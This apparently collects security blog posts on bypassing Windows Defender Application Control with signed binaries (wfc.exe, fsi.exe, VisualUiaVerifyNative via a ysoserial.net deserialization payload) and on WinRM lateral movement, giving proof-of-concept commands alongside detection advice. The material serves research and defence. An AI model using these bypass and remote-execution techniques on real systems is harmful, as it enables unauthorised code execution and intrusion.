Look for log instances of (irregular) unmanaged binaries and script hosts that would not typically load the CLR to create a Usage Log. Leverage Olaf Hartong’s (@olafhartong) Sysmon-Modular rule config and/or this Elastic Security rule query as a baseline for getting started with a rule set. Additionally, Samir (@SBousseaden) provides an excellent detection tip for monitoring WinRM Lateral Movement using .NET tools.

Furthermore, audit and monitor for attempts to remove Usage Log files as offensive operators may remove the Usage Log files from disk to cover their tracks. Note: This is tradecraft is mentioned in the MENASEC blog post.

Monitor for suspicious .NET runtime loads. Identifying suspicious .NET CLR runtime loads may be an interesting compensation detection mechanism if Usage Log evasions are deployed. Unmanaged processes that load the CLR (e.g. MS Office). could be an indicator of compromise.

Monitor for CLR configuration knob additions or modifications. Roberto Rodriguez (@Cyb3rWard0g) authored a fantastic write-up for detecting the [COMPLUS_]ETWEnabled configuration knob adjustment behavior that includes SACL audit recommendations, Sysmon configuration settings, Sigma rules, and a Yara rule. The same methodologies can be applied to detect [COMPLUS_]NGenAssemblyUsageLog configuration knob modifications. A summary of (replicated) recommendations include the following:

  • Hunt for the addition of the NGenAssemblyUsageLog string in the HKCU\Software\Microsoft\.NETFramework and HKLM\Software\Microsoft\.NETFramework Registry keys. As Roberto points out, Event ID 4657 is generated when the audit object access policy is enabled and the target key is audited for key write/set value events:
  • Hunt for the prepending of COMPlus_ in permanent user/system environment variables (see Roberto’s notes), and temporary environment variables where applicable – e.g. process command line , transcription logs, etc.

Monitor for process module tampering. Monitoring for ‘suspicious’ process termination events may not be practical in most organizations. However, unloading DLLs from a running process could be an interesting detection opportunity. As described by spotheplanet (@spotheplanet) in this post, module unloads can be traced with the ETW Microsoft-Windows-Kernel-Process provider.

Future Research & Conclusion

If you discover other Usage Log evasion techniques or have improved ideas for detecting them, please feel free to reach out on Twitter and I will link to your resource page. I am currently investigating an “in-depth” technique that may circumvent Usage Log creation, but my current approach hasn’t quite worked out just yet :).

Of note, MSRC was notified of this issue prior to the release of this post. Microsoft does not consider Usage Log evasion a security boundary issue.

And as always, thanks for taking the time to read my posts!

~ Bohops

Exploring the WDAC Microsoft Recommended Block Rules (Part II): Wfc.exe, Fsi.exe, and FsiAnyCpu.exe

Introduction

In Part One, I blogged about VisualUiaVerifyNative.exe, a LOLBIN that could be used to bypass Windows Defender Application Control (WDAC)/Device Guard. The technique used for circumventing WDAC was originally discovered by Lee Christensen, however, it was not previously disclosed like a handful of others on the Microsoft Recommended Block Rules list.

If you are familiar with WDAC, you likely have come across the recommended block rules page at some point and have noticed the interesting list of binaries, libraries, and the XML formatted WDAC block rules policy. Microsoft recommends merging the block rule policy with your existing policy if your IT organization uses WDAC for application control. This is necessary to account for bypass enablers and techniques that are not formally serviced.

In attempt to unravel the mysteries behind the lesser known techniques of the ‘blocked’ LOLBINs and further populate the Ultimate WDAC Bypass List, we’ll explore wfc.exe, fsi.exe, and fsianycpu.exe in this quick blog post. Although these LOLBINs are mitigated when the WDAC Recommended Block Rules policy is (merged and) enforced, there still may be other utility such as EDR evasion and application control bypass if WDAC block rules are not enforced.

WDAC Configuration

For ease, we leverage the same WDAC configuration from the previous post. Instructions for setting up the enforce Code Integrity (UMCI) policy at the PCA certificate level can be found here. Since we are examining previously discovered techniques, we must not merge the Block Rules policy (as stated in the directions) else the LOLBINs will be mitigated :-).

After setting up our policy, rebooting, and logging in (as a low privileged user), we validate whether the policy is enforced by checking the results from MSInfo32.exe:

With a quick test to validate the WDAC policy, we can see that our attempt to run a VBscript with COM object instantiation fails due to Code Integrity policy enforcement:

Now, let’s take a quick look at a few interesting LOLBIN bypass enablers…

Wfc.exe Application Control Bypass

Wfc.exe is the Workflow Command-line Compiler Tool and is included with the Windows Software Development Kit (SDK). Like many other Microsoft LOLBINs on the block list, wfc.exe is Microsoft signed since it is not native to the OS:

So, you maybe thinking that the “workflow compiler” sounds very familiar. You may recall Matt Graeber’s excellent research and write-up for a WDAC arbitrary code execution bypass for Microsoft.Workflow.Compiler.exe. Wfc.exe is actually the predecessor to the modern workflow compiler and was added to the block list at the same time.

Like the Microsoft.Workflow.Compiler.exe, wfc.exe has a library dependency on System.Workflow.ComponentModel.dll for compilation functionality. As Matt points out in his post, System.Workflow.ComponentModel.Compiler.WorkflowCompilerInternal.Compile() calls the GenerateLocalAssembly() which eventually calls Assembly.Load() in the call chain for arbitrary code execution:

Code Snippet made possibly by dnSpy

Wfc.exe has numerous command line and compiler options. However, all we need to supply is a XOML file that contains our embedded .NET code and constructor. For our proof-of-concept, we’ll leverage Matt’s test.xoml file:

<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
    <CodeActivity x:Name="codeActivity1" />
    <x:Code><![CDATA[
    public class Foo : SequentialWorkflowActivity {
     public Foo() {
            Console.WriteLine("FOOO!!!!");
        }
    }
    ]]></x:Code>
</SequentialWorkflowActivity>

After launching wfc.exe, we can see that the .NET C# code is executed under the enforced WDAC policy:

wfc.exe c:\path\to\test.xoml

In Procmon, we can see that the C# code is compiled with the CSharp compiler then executed by wfc.exe:

Fsi.exe/FsiAnyCpu.exe Application Control Bypass

Fsi.exe and fsianycpu.exe are FSharp (F#) interpreters. These Microsoft signed binaries are included with Visual Studio and execute FSharp scripts via interactive command line or through scripts (with .fsx or .fsscript extensions). Fsi.exe executes in a 64-bit context. Fsianycpu.exe uses “the machine architecture to determine whether to run as a 32-bit or 64-bit process” (Microsoft Docs).

The original execution capability is demonstrated by Nick Tyrer in this tweet with this F# script. Under an enforced WDAC policy, the F# script invokes the Get-Process cmdlet via unmanaged PowerShell:

fsi.exe c:\path\to\test.fsscript
fsianycpu.exe c:\path\to\test.fsscript
Image

…and that’s it! Let’s take a look at a few defensive recommendations…

Defensive Considerations

  • If you deploy WDAC within your environment, consider merging the block rules with your current WDAC policy (or block the LOLBINs with another Application Control solution). If you prefer to go the EDR route, consider integrating analytics/queries to observe blocklist LOLBIN behavior. Additionally, monitor for .NET compiler usage such as csc.exe and cvtres.exe.
  • If enforcement policies are not ideal for your environment, consider using the audit mode features of WDAC (or another Application Control solution) as a source for additional telemetry.
  • As Matt Graeber covers in his blog post and subsequent work with ETW, the need (and accessibility) for optics in .NET are crucial, especially for risky primitives. In a recent post, we demonstrated the ability to collect Assembly.Load() events with a proof-of-concept ETW monitor. The ability to collect, process, and evaluate suspicious .NET events at an enterprise scale should be in reach for capable vendors.
  • For a more interesting overview of Application Control solutions (including WDAC) and links to other great researcher resources, refer to this post.

Conclusion

Thanks for taking the time to read this post. Keep an eye out for Part III of this series in the near future!

~ Bohops

Exploring the WDAC Microsoft Recommended Block Rules: VisualUiaVerifyNative

Introduction

If you have followed this blog over the last few years, many of the posts focus on techniques for bypassing application control solutions such as Windows Defender Application Control (WDAC)/Device Guard and AppLocker. I have not been blogging as much lately but wanted to get back into the rhythm and establish a similar theme for at least the next few posts by exploring the ‘forgotten’ lolbins on the WDAC Microsoft Recommended Block Rules page.

Microsoft Block Rules Primer

If you are familiar with WDAC, you likely have come across the Recommended Block Rules page at some point and have noticed the interesting list of binaries, libraries, and the never ending XML formatted WDAC block rules policy. Microsoft recommends merging the block rule policy with your existing policy if your IT organization uses WDAC for application control.

WDAC is considered a formal security boundary. Novel circumvention of an enforced code integrity policy (e.g. executing unsigned arbitrary code) may result in a CVE from Microsoft if patched or a few added deny rules within the block rules policy (dedicated in your honor, of course).

The decision making process for deciding wither to either service a bypass vulnerability or add a policy mitigation is something that I do not fully understand. Speculatively, the decision tree is complex, and I’d imagine that decision usually boils down to impact, cost (level of effort), and time. Regardless, the block rules policy is essential for mitigating the residual risk of discovered WDAC bypass techniques…especially those caused by pesky lolbins.

There was something mentioned about forgotten

In the last few years, there have been a lot of great posts and presentations about WDAC internals and circumvention. I decided to centralize the various public write-ups for easier accessibility in a common place (which is a work in progress) as well as (somehow) unravel the mysteries behind the publicly undocumented techniques of those lolbins on the block rules page, which still may have utility for a variety of use cases (e.g. app control policy oversight). My simple notes on the matter can be accessed here until a better solution is adopted. Now, Let’s take a look at one of these interesting lolbins: VisualUiaVerifyNative.

Circumventing WDAC with VisualUiaVerifyNative

While going through the ‘undocumented’ candidates on the WDAC list, VisualUiaVerifyNative stuck out to me because I recalled seeing it somewhere while learning more about WDAC a few years ago. It turns out that it was actually mentioned within this pull request for RunScriptHelper by Matt Graeber (@mattifestation) in 2017. The original discovery was made by Lee Christensen (@tifkin_), whose discovery methodology for finding bugs is likely way more polished than my own :). Fortunately for us, we already know which lolbin to examine, so the hardest part is done. Let’s dive in to see if we can make sense of how VisualUiaVerifyNative can be used to bypass WDAC.

VisualUiaVerifyNative Background

VisualUiaVerifyNative (visualuiaverifynative.exe) is the GUI executable binary for UI Automation Verify, a “testing framework for manual and automated testing of a control’s or application’s implementation of Microsoft UI Automation” (Microsoft Docs). VisualUiaVerifyNative is included with the Windows Software Development Kit (SDK). On our WDAC test machine, various instances of the binary are located in the following depicted paths:

VisualUiaVerifyNative Analysis

We quickly discover that VisualUiaVerifyNative is a .NET application. Using dnSpy to ‘decompile’ to source code, we come across a very interesting function called ApplicationStateDeserialize() in the MainWindow class. At first glance, a configuration file with a suffix of uiverify.config appears to be loaded and deserialized via BinaryFormatter.Deserialize():

The first time VisualUIAVerifyNative is executed, the configuration file does not exist but the program will attempt to locate it anyway. If not found, the file is simply created :

In the previous screenshot, we can see that the file is actually named Roaminguiverify.config and stored in the user’s \AppData directory:

Interestingly, the naming of the file appears to be as a simple oversight as it missing an escaped “\”. The file should reside in the user’s \AppData\Roaming directory (if I had to guess).

Regardless, Roaminguiverify.config is successfully read into the program if it exists as verified by the following Procmon ETW trace:

Furthermore, A simple screen print of the Roaminguiverify.config contents shows that it is in a serialized format:

Returning the attention to VisualUIAVerifyNative, we note that the application is Microsoft signed. As such, it will likely be able to run when a WDAC policy is enforced at (least) the PcaCertificate level:

To test simple exploitation, a serialized payload is built with the Ysoserial.net project as follows:

ysoserial.exe -f BinaryFormatter -g TextFormattingRunProperties -o raw -c "notepad" > Roaminguiverify.config

The following screenshot verifies payload creation:

In this case, the YoSoSeial.Net TextFormattingRunProperties gadget is leveraged for simplicity as it builds a XAML command payload with the .NET Process class (via System.Diagnostics) to execute a command (notepad.exe in this case). After replacing Roaminguiverify.config with our same named serialized file, payload execution is successful when visualuiaverifynative.exe is launched:

*Note: An exception pops up in this case because it is not the expected data.

Excellent! We have an eligible Microsoft signed binary and a deserialization primitive that we may be able to abuse for circumventing WDAC. Let’s put it to the test…

WDAC Configuration

To test the use of VisualUIAVerifyNative deserialization as a vector for application control bypass, a WDAC/Device Guard Code Integrity policy is configured based on the directions located here. For this configuration, a scan policy is created at the PCA certificate level. However, we do not merge the Block Rules policy as stated in the directions so that VisualUIAVerifyNative has a chance to execute :). The following screenshot demonstrates how a WDAC policy is enforced and loaded (following a reboot):

After rebooting and logging in as a low privileged user, we can validate whether the policy is enforced by checking MSInfo32.exe:

Before validating the bypass, let’s perform a quick test to run something that should fail. In this test case, we’ll run a simple Jscript payload with cscript.exe.  As expected, the COM object cannot be created via WDAC Code Integrity policy enforcement:

Next, we copy our serialized payload to the path we expect VisualUIAVerifyNative to read the serialized payload file. In this case, the following path is expected under the lowpriv account:

C:\Users\lowpriv\AppData\Roaminguiverify.config

Lastly, we launch VisualUIAVerifyNative and see that the serialized payload is executed accordingly. Fantastic!

Defensive Considerations

  • Although not all bypass techniques have been disclosed for block list lolbins, there is still residual risk for opportunistic abuse.
  • If you deploy WDAC within your environment, consider merging the block rules with your current WDAC policy. If you prefer to go the EDR route, consider integrating analytics/queries to observe blocklist lolbin behavior.
  • If enforcement policies are not ideal for your environment, consider using WDAC in audit mode for added visibility and telemetry to compliment other security solutions.
  • For a more interesting overview of Application Control solutions (including WDAC) and links to other great researcher resources, refer to this post.

Conclusion

Thanks for taking the time out of your busy day to read this post. I plan to follow up with a few similar posts unless others beat me to the punch (which is very much welcome).

Take Care,

~ Bohops

WS-Management COM: Another Approach for WinRM Lateral Movement

Introduction

Lateral movement techniques in the wonderful world of enterprise Windows are quite finite.  There are only so many techniques and variations of those techniques that attackers use to execute remote commands and payloads.  With the rise of PowerShell well over a decade ago, most ethical hackers may agree that Windows Remote Management (WinRM) became a major of part of their “lateral movement toolkit” when the right (privileged) credential or identity was captured.  With “remote” cmdlets like Invoke-Command, *-PSSession, and *-CimSession, ethical hackers rode the WinRM wave because PowerShell made it that much easier to do so. 

PowerShell certainly still has its uses cases in today’s climate.  However, the rise of better detection optics and enhanced visibility in version 5+ have made PowerShell less appealing for post-exploitation.  Furthermore, modern tooling has shifted away from PowerShell to managed .NET and (back to) unmanaged C/C++.  Although the offensive trends are shifting, WinRM can still a viable option (at least, in my opinion).

In this post, we will make a valiant effort to decouple WinRM from PowerShell and take a look at a few other tools that leverage WinRM for remote command execution and lateral movement.  Additionally, we will showcase how we can leverage WSMAN.Automation, a very interesting COM object, to run remote commands over WinRM transport.  To accomplish this, we will walk through the process of building a simple proof-of-concept .NET C# tool.   

Let’s get started…

A Brief Overview of WinRM

Windows Remote Management (WinRM) “is the Microsoft implementation of WS-Management Protocol (Web Services for Management aka WSMan), a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate” (Microsoft Docs). 

As an alternative to DCOM and WMI for remote management, WinRM is used to establish sessions with remote computers over WSMan, which leverages HTTP/S as transport mechanism to deliver XML formatted messages.  In modern Windows systems, WinRM HTTP communication occurs over TCP port 5985 and HTTPS (TLS) communication occurs over TCP port 5986.  WinRM supports NTLM and Kerberos (domain) authentication natively.  After initial authentication, the WinRM sessions are protected with AES encryption (Microsoft Docs).

Note: The WinRM service must be configured and running in order to accept remote connections.  This can be setup quickly with the winrm.cmd quickconfig command or through Group Policy.  A few more steps may be required for WinRM to accept connections.  Please see this Pentest Lab article for more info.

WinRM Tools & Capabilities

Let’s take a quick look at a few WinRM capabilities (outside of PowerShell):

Winrs.exe

Winrs.exe is a built-in command line tool that allows for the execution of remote commands over WinRm with a properly credentialed user.  The command supports a variety of switches as well as the ability to use alternate credentials for authentication.  Example command usage is as follows:

winrs -r:corp-dc "whoami /all"

01

Although the tool offers an easy way to invoke remote commands, detection opportunities are relatively trivial.  As Matt Graeber (@mattifestation) points out in this Tweet, the remote process chain for successful command execution is as follows:

svchost.exe (DcomLaunch)-> winrshost.exe -> cmd.exe [/c remote command] -> [remote command/binary]

02

Additionally, Winrs events are logged on the remote host as Microsoft-Windows-WinRM/Operational (Event ID 91).

03

Winrm.vbs (As Called Through Winrm.cmd)

Winrm.vbs is a Visual Basic Script that allows administrators “to configure WinRM and to get data or manage resources”  (Microsoft Docs).   As discussed in Matt Graeber’s “Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asyncronous, and Fileless Backdoor” whitepaper, WinRM(.vbs) allows for remote interaction of WMI objects over WinRM transport.  This is interesting because several WMI classes can be leveraged to perform remote command execution.  For instance, a very well-known WMI class, Win32_Process, can be used to spawn a (remote) process by leveraging the Create method.  In the following Winrm(.vbs) example, the invoke command spawns a remote notepad.exe process on a host named corp-dc:

winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad"} -r:corp-dc

04

The Process Identifier (PID) and ReturnValue is returned in event XML metadata to confirm successful remote execution:

On the remote host, the process execution chain appears as follows:

svchost.exe (DcomLaunch) -> wmiprvse.exe -> [remote command/binary]

05

Third-Party WinRM Tools

It is also worth mentioning that other 3rd party WinRM capabilities exist outside of Windows including:

  • Metasploit – Contains modules in auxiliary/scanner/winrm/* and exploit/windows/winrm/* 
  • PyWinRM – A Python client to execute remote commands
  • CrackMapExec– Contains a Python WinRM command module
  • Evil-WinRM – Is a fully featured WinRM shell implemented in Ruby

WS-Management Component Object Model (COM)

At the time when I was investigating this topic, I noticed that there was not really much offered in the way of Windows tooling outside of PowerShell that leveraged WinRM for remote command execution/lateral movement.  I’ve decided to take a closer look and discovered some information about the WinRM Scripting API on Microsoft Doc/Windows Dev Center and on a few interesting StackOverflow/message board posts.  Much of the core capabilities are driven by an underappreciated COM class that works very hard behind the scenes – WSMan.Automation.

Exposed methods and properties of the WSMan.Automation COM object revealed several interesting methods and properties:

06

A quick peek at the source code of WinRM.vbs showed that WsMan.Automation was leveraged to establish the WinRM (remote) sessions for management, querying, and invocation:

07

08

Furthermore, we can leverage OleView.Net by James Forshaw (@tiraniddo) to take a look at the COM class in greater detail.  These key takeaways are noted:

  • The CLSID is BCED617B-EC03-420B-8508-977DC7A686BD
  • The In-Process server is named WsmAuto.dll
  • The Type Library is called Microsoft WSMAN Automation V1.0 Library, and it is implemented in the WsmAuto.dll library
  • There are two primary supported interfaces of interest – IWSMan and IWSManEx

09

We now have some background on a vector that we could (potentially) use to develop our own POC WinRM tools.  Let’s dive in…

Building a POC WinRM Remote Command Execution Tool in .NET C#

In this section, we will walk through the process of creating a POC tool – SharpWSManWinRm.exe

A Brief Note on .NET COM Interop

For .NET, Visual Studio makes integrating (many) COM components (objects) quite seamless.  A COM reference is added to an assembly project by selecting a predefined component in the Reference Manager or by selecting another component file from disk such as an unmanaged library (DLL) or Type Library (TLB) file.  Visual Studio parses the Type Library and maps COM interfaces and classes to a namespace structure within an auto-generated managed interop library (DLL) that is included within the project. 

At runtime, the .NET Common Language Runtime (CLR) creates “Runtime Callable Wrappers” (RCW) to hold interface pointers and marshal calls between .NET and created COM objects (instances).    From a .NET perspective, this makes COM objects appear as .NET objects and “simplifies” the managed code necessary to work with those respective COM objects.

Note: For more information about RCW, please refer to the COM Interop pages on Microsoft Docs.  In some instances, it may be necessary to work with external COM objects that requires a manual approach for creating the interop definitions.  For information about manually creating wrappers with Interface Definition Language (IDL) or Type Libraries, refer to this Microsoft Doc write-up.

Setting Up a WSMan/WinRM Project with Visual Studio

After we create a new .NET Framework (4) console application project, add the COM reference by right clicking the References menu in Solutions Explorer and selecting Add Reference:

10

In the Reference Manager, select Browse and import the WsmAuto.dll file from \Windows\System32\:

11

Alternatively, Microsoft WSMAN Automation V1.0 Type Library can be selected from the COM menu in Reference Manager to achieve the same result:

12

After the Reference is added, Visual Studio kindly generates the Interop.WSManAutomation.dll interop assembly and namespace for interacting with the WSMan Automation COM components as noted in the Reference properties:

13

With the added Reference, we can now leverage the WSManAutomation namespace in a using statement to access the targeted interfaces, methods, and properties:

14

Auto-Generated Interop Assembly

Before moving on, let’s take a quick peek into the Interop.WSManAutomation.dll that was auto-generated.  Using dnSpy, we can ‘decompile’ the assembly to view the source code:

18

We can see how the DLL assembly wraps up the interfaces and methods/properties/etc. in a convenient way to call in our C# console project.  When the project code is compiled, this DLL is merged with the output assembly.

Coding the WinRM POC

With the WSman.Automation object, we can leverage the same WMI classes for remote command execution that was showed earlier with WinRm.vbs.  This is implemented in our POC C# code (below) as follows:

  1. wsman is our initialized a .NET/C# object, which implements the iWSManEx interface that extends the methods and properties of the iWSMan interface.
  2. options is a NET/C# object that calls the CreateConnectionOptions() method for setting IWSManConnectionOptions, which specifies the username and password (if any are set) for the session.
  3. session is a NET/C# object that calls the CreatSession() method for establishing the connection with the specified target (sessionUrl). If a username and password are set in CreateConnectionOptions(), the SessionFlagCredUsernamePassword() method sets the authentication flag for the specified target.
    Note: Other flags can be set to specify authentication methods such as Negotiate or Kerberos.
  4. The Invoke() method is called to invoke a WMI class action.  In this case, the WMI Create method (action) is called to specify the creation of a remote process (from Win32_Process).  resource is the retrieved WMI class identifier, and parameters contains the XML input, which includes the process/command to be executed.

15

Running the WinRM POC

After compiling the project assembly, we can run it against a target machine and retrieve the Process ID and return information:

Command 1-

SharpWSManWinRM.exe corp-dc notepad

Command 2 (with credentials) –

SharpWSManWinRM.exe corp-dc notepad corp\corpmin CorpM@ster

16

On the remote host, the process execution chain appears as follows:

svchost.exe (DcomLaunch) -> wmiprvse.exe -> [remote command/binary]

17

“WSMan-WinRM” Project

Project source code is accessible in the WSMan-WinRM GitHub repository, which includes the CSharp version as well as several other POC implementations that leverage the WMI Win32_Process class execution method.  The following are included in the project:

  • SharpWSManWinRM.cs (CSharp)
  • CppWSManWinRM.cpp (C++)
  • WSManWinRM.vbs (Visual Basic Script)
  • WSManWinRM.js (JScript)
  • WSManWinRM.ps1 (PowerShell – similar to the Invoke-WSManAction cmdlet)

Tradecraft

Calling the Win32_Process class is not the only way to leverage WMI classes for remote command execution.  Philip Tsukerman (@PhilipTsukerman) released a lot of great information about WMI Lateral Movement tradecraft in the “No Win32_Process Needed – Expanding The WMI Lateral Movement Arsenal” blog post as well this talk.

Defensive Considerations

There are certainly approachable opportunities for detecting and restricting WinRM remote command execution/lateral movement.  Consider the following:

  • Monitor the remote process execution chains stemming from wmiprvse.exe and winrshost.exe
  • Monitor the Microsoft-Windows-WinRM/Operational Event Log for suspicious entries.  Note: During testing for the WMI class interactions (WinRM.vbs/SharpWSManWinRM/etc), it did not appear that successful connected sessions were logged here.  However, unsuccessful errors were logged with the name of the WMI resource.
  • Consider whitelisting trusted hosts to allow only certain machines to connect to WinRM servers. More information can be found in this Red Canary blog post Note: WinRM trusted hosts control what client can connect to.  As such, this setting can be advantageous to control this in a centralized manner, but a better approach is to leverage jump hosts and (host) firewall rules to control which machines that should be allowed to connect to WinRM hosts.
  • Administrators are not the only users that can leverage WinRM for remote management. Members of the Remote Management Users local/domain group can connect to WMI resources over WinRM.  Ensure that group membership is only allowed for authorized personnel only.

Conclusion

Thank you for taking the time to read this blog post.  I believe there are more interesting research opportunities in this area (maybe a CSharp “PSSession” capability?).  I look forward to seeing others take this to the next level.  Lastly, I’d like to give a shout out to Leo Loobeek (@leoloobeek) – thanks you for the fantastic insight in our discussions about COM and coding.  It certainly helped shape this post!

~ @bohops

❌